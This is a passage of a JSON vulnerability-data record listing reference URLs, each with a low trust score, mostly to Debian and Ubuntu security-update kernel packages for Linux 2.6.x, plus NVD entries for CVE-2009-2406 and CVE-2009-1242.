        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2406"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.8etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.8etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.8etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-generic_2.6.27-14.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-virtual_2.6.28-13.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc_2.6.15-54.77_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-server_2.6.28-13.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-generic_2.6.28-13.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-rt_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-14.35_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc64-smp_2.6.15-54.77_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-13-lpia_2.6.28-13.45_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-rt_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-generic_2.6.28-13.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc-smp_2.6.15-54.77_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-virtual_2.6.27-14.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-386_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc-smp_2.6.24-24.55_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-generic_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-13.45.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc64-smp_2.6.15-54.77_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-openvz_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-generic_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server-bigiron_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-server_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-generic_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1242"
      },
      {
        "trust": 0.1,
